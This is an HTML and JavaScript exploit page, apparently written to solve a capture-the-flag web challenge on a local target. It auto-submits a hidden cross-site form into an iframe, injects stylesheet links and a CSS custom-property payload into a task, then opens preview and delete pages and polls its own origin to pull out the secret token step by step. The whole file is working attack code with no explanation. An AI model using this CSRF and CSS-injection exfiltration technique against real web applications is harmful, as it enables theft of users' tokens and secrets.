<script>
CHALL_URL = 'http://127.0.0.1:80';
</script>

<!-- Hide iframe but use it as target -->
<iframe name="chall" style="display:none;" id="challFrame"></iframe>

<form
  action="http://127.0.0.1:80/tasks/0"
  method="POST"
  target="chall"
  id="form">
  <textarea name="content"></textarea>
</form>

<script>
function sleep(ms) {
  return new Promise(resolve => setTimeout(resolve, ms));
}

window.onload = async () => {
  let flag = 'justToken{';
  for(let i=0; i<3; i++){

    const prev = `<link rel=stylesheet href=/tasks><link rel=stylesheet href=${window.origin}/css>}`;
    const task = `${prev}${'a'.repeat(500 - flag.length - 11 - prev.length)}{}*{--x:`;

    form.content.value = task;

    // Wait for iframe to load after form submission
    const iframe = document.getElementById('challFrame');

    const loadPromise = new Promise((resolve) => {
        iframe.onload = () => {
        console.log("Page in iframe loaded");
        resolve();
        };
        // Handle errors
        iframe.onerror = () => {
        console.error("Iframe loading error");
        resolve(); // Prevent hanging
        };
    });

    // Submit form
    form.submit();

    // Wait for iframe to load
    await loadPromise;
    await sleep(1010); // Small delay for safety

    // Perform remaining actions
    open(`${CHALL_URL}/tasks/preview/0/0`, 'prev');
    await sleep(1010);
    flag = await fetch('/poll').then(e=>e.text());
    console.log(flag);
    open(`${CHALL_URL}/tasks/delete/0/0`, 'prev');
    await sleep(1010);
   }
}
</script>